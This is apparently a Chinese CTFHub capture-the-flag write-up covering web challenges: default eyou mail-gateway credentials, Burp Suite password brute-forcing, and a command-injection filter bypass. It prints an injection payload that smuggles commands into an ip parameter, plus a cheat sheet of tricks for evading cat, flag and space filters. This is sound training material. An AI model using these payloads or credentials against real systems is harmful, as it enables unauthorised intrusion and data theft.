-
Phpinfo
输入phpinfo.php即可
-
目录遍历
随便点,每次flag的位置是随机的,
默认口令
根据网站名称,百度搜索eyou邮件网关的默认密码,发现系统有三个默认的帐号(admin:+-ccccc、eyougw:admin@(eyou)、eyouuser:eyou_admin)最后,
eyouuser admin_@(eyou)即可
弱口令
Bp抓包后爆破
先随意输入密码和应户名,打开bp选择Proxy进行抓包然后发送给Intruder,导入弱口令字典后进行爆破即可,为admin,CTFHub
综合过滤
由题目可知过滤管道符,flag,空格,用可以尝试用%0a(换行符),通配符,%09(回车符号),来代替
尝试后为这个
未发现,加上通配符*后
?ip=1%0Acd%09*_is_here%0Atac%09*_2530108722716.php
表示:?ip=1;cd *_is_here;tac *_2530108722716.php
得到这个界面后即可查看源代码得到flag
知识点
对于payload,有这么几种过滤方法:
- 过滤用分号;
- 过滤空格
- 过滤关键字cat,flag
- 过滤反斜杠 /
简单绕过 cat的方法
/bin/c?t flag
c'a't flag
c''at flag
c""at flag
c\at flag
通配符
在Linux中?
问号可以代替任意一个字符*
星号可以代替多个字符
过滤flag
(1)用通配符绕过?c=system('cat f*')
(2)复制:system("cp fla*.php 1.txt")
执行文件:1.txt
过滤flag,php,system(对命令执行函数进行过滤)
(以上是对于eval型,即将字符串作为php代码执行)
过滤空格
- <
- <>
- %20
- %09
- ${IFS}
- $IFS
- {cat,/flag}